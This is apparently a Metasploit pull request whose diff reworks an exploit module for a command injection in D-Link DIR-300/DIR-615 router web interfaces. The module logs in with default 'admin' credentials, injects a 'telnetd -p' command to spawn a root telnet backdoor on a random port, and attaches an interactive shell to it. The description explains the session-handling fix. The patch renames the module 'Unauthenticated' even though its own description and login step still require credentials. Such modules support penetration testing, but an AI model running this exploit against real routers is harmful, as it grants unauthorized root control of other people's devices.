### PR TITLE
Fix dlink_dir300_exec_telnet 

### DIFF
--- a/modules/exploits/linux/http/dlink_dir300_exec_telnet.rb
+++ b/modules/exploits/linux/http/dlink_dir300_exec_telnet.rb
@@ -23,7 +23,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			},
 			'Author'      =>
 				[
-					'Michael Messner <devnull@s3cur1ty.de>', # Vulnerability discovery and Metasploit module
+					'Michael Messner <devnull[at]s3cur1ty.de>', # Vulnerability discovery and Metasploit module
 					'juan vazquez' # minor help with msf module
 				],
 			'License'     => MSF_LICENSE,

--- a/modules/exploits/linux/http/dlink_dir300_exec_telnet.rb
+++ b/modules/exploits/linux/http/dlink_dir300_exec_telnet.rb
@@ -11,23 +11,19 @@ class Metasploit3 < Msf::Exploit::Remote
 	Rank = ExcellentRanking
 
 	include Msf::Exploit::Remote::HttpClient
-	include Msf::Auxiliary::CommandShell
 
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'        => 'D-Link Devices Authenticated Remote Command Execution',
+			'Name'        => 'D-Link Devices Unauthenticated Remote Command Execution',
 			'Description' => %q{
 				Different D-Link Routers are vulnerable to OS command injection via the web
 				interface. The vulnerability exists in tools_vct.xgi, which is accessible with
-				credentials. This module has been tested with the versions DIR-300 rev A v1.05
-				and DIR-615 rev D v4.13. Two target are included, the first one starts a telnetd
-				service and establish a session over it, the second one runs commands via the CMD
-				target. There is no wget or tftp client to upload an elf backdoor easily. According
-				to the vulnerability discoverer, more D-Link devices may affected.
+				credentials. According to the vulnerability discoverer, more D-Link devices may
+				be affected.
 			},
 			'Author'      =>
 				[
-					'Michael Messner <devnull[at]s3cur1ty.de>', # Vulnerability discovery and Metasploit module
+					'Michael Messner <devnull@s3cur1ty.de>', # Vulnerability discovery and Metasploit module
 					'juan vazquez' # minor help with msf module
 				],
 			'License'     => MSF_LICENSE,
@@ -40,27 +36,21 @@ class Metasploit3 < Msf::Exploit::Remote
 				],
 			'DisclosureDate' => 'Apr 22 2013',
 			'Privileged'     => true,
-			'Platform'       => ['linux','unix'],
-			'Payload'        =>
+			'Platform'       => 'unix',
+			'Arch'        => ARCH_CMD,
+			'Payload'     =>
 				{
-					'DisableNops' => true,
+					'Compat'  => {
+						'PayloadType'    => 'cmd_interact',
+						'ConnectionType' => 'find',
+					},
 				},
+			'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
 			'Targets'        =>
 				[
-					[ 'CMD',	#all devices
-						{
-						'Arch' => ARCH_CMD,
-						'Platform' => 'unix'
-						}
-					],
-					[ 'Telnet',	#all devices - default target
-						{
-						'Arch' => ARCH_CMD,
-						'Platform' => 'unix'
-						}
-					],
+					[ 'Automatic',	{ } ],
 				],
-			'DefaultTarget'  => 1
+			'DefaultTarget'  => 0
 			))
 
 		register_options(
@@ -69,6 +59,20 @@ class Metasploit3 < Msf::Exploit::Remote
 				OptString.new('PASSWORD',[ false, 'Password to login with', 'admin']),
 
 			], self.class)
+
+		register_advanced_options(
+			[
+				OptInt.new('TelnetTimeout', [ true, 'The number of seconds to wait for a reply from a Telnet command', 10]),
+				OptInt.new('TelnetBannerTimeout', [ true, 'The number of seconds to wait for the initial banner', 25])
+			], self.class)
+	end
+
+	def tel_timeout
+		(datastore['TelnetTimeout'] || 10).to_i
+	end
+
+	def banner_timeout
+		(datastore['TelnetBannerTimeout'] || 25).to_i
 	end
 
 	def exploit
@@ -81,12 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		end
 
 		test_login(user, pass)
-
-		if target.name =~ /CMD/
-			exploit_cmd
-		else
-			exploit_telnet
-		end
+		exploit_telnet
 	end
 
 	def test_login(user, pass)
@@ -129,23 +128,10 @@ class Metasploit3 < Msf::Exploit::Remote
 		end
 	end
 
-	def exploit_cmd
-		if not (datastore['CMD'])
-			fail_with(Exploit::Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible")
-		end
-		res = request(payload.encoded)
-		if (!res or res.code != 302 or res.headers['Server'].nil? or res.headers['Server'] !~ /Alpha_webserv/)
-			fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
-		end
-
-		print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state\n")
-		return
-	end
-
 	def exploit_telnet
 		telnetport = rand(65535)
 
-		vprint_status("#{rhost}:#{rport} - Telnetport: #{telnetport}")
+		print_status("#{rhost}:#{rport} - Telnetport: #{telnetport}")
 
 		cmd = "telnetd -p #{telnetport}"
 
@@ -153,37 +139,27 @@ class Metasploit3 < Msf::Exploit::Remote
 		request(cmd)
 
 		begin
+			print_status("#{rhost}:#{rport} - Trying to establish a telnet connection...")
 			sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i })
 
-			if sock
-				print_good("#{rhost}:#{rport} - Backdoor service has been spawned, handling...")
-				add_socket(sock)
-			else
-				fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
+			if sock.nil?
+				fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
 			end
 
-			print_status "Attempting to start a Telnet session #{rhost}:#{telnetport}"
-			auth_info = {
-				:host   => rhost,
-				:port   => telnetport,
-				:sname => 'telnet',
-				:user   => "",
-				:pass	=> "",
-				:source_type => "exploit",
-				:active => true
-			}
-			report_auth_info(auth_info)
-			merge_me = {
-				'USERPASS_FILE' => nil,
-				'USER_FILE'     => nil,
-				'PASS_FILE'     => nil,
-				'USERNAME'      => nil,
-				'PASSWORD'      => nil
-			}
-			start_session(self, "TELNET (#{rhost}:#{telnetport})", merge_me, false, sock)
+			print_status("#{rhost}:#{rport} - Trying to establish a telnet session...")
+			prompt = negotiate_telnet(sock)
+			if prompt.nil?
+				sock.close
+				fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to establish a telnet session")
+			else
+				print_good("#{rhost}:#{rport} - Telnet session successfully established...")
+			end
+
+			handler(sock)
 		rescue
-			fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
+			fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Could not handle the backdoor service")
 		end
+
 		return
 	end
 
@@ -203,7 +179,24 @@ class Metasploit3 < Msf::Exploit::Remote
 			})
 		return res
 		rescue ::Rex::ConnectionError
-			fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Could not connect to the webservice")
+			fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{rport} - Could not connect to the webservice")
 		end
 	end
+
+	def negotiate_telnet(sock)
+		begin
+			Timeout.timeout(banner_timeout) do
+				while(true)
+					data = sock.get_once(-1, tel_timeout)
+					return nil if not data or data.length == 0
+					if data =~ /\x23\x20$/
+						return true
+					end
+				end
+			end
+		rescue ::Timeout::Error
+			return nil
+		end
+	end
+
 end

--- a/modules/exploits/linux/http/dlink_dir300_exec_telnet.rb
+++ b/modules/exploits/linux/http/dlink_dir300_exec_telnet.rb
@@ -183,6 +183,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		end
 	end
 
+	# Since there isn't user/password negotiation, just wait until the prompt is there
 	def negotiate_telnet(sock)
 		begin
 			Timeout.timeout(banner_timeout) do


### PR DESCRIPTION
While working with @m-1-k-3 on #2188 we've figured out which the last modules trying to get a session through the telnet service were wrong because of two things:
- Even when there isn't authentication a telnet negotiation is required, which mainly is to read from the socket until the prompt is received, in order to flush it.
- The correct way to create a session from an exploit isn't to use Msf::Auxiliary::CommandShell::start_session, but to use the cmd/unix/interact payload (find type) and allow the handler to start the session over the telnet connection, so callbacks like "on_new_session" are available once the session is created. 

This is the first pull request trying to fix the incorrect modules:

modules/exploits/linux/http/dlink_dir300_exec_telnet.rb (this module tries to fix this one)
modules/exploits/linux/http/dlink_upnp_exec_noauth.rb
modules/exploits/linux/http/dlink_command_php_exec_noauth.rb

Any feedback about the new way of proceeding in order to get a session from a telnet connection is welcome. If there is something wrong please let me know! 

On the other hand, a simulation environment can be build with Ubuntu and busybox, but if you need the real data (screenshots and pcap's) for verification of the changes working against a real device, please contact me directly.
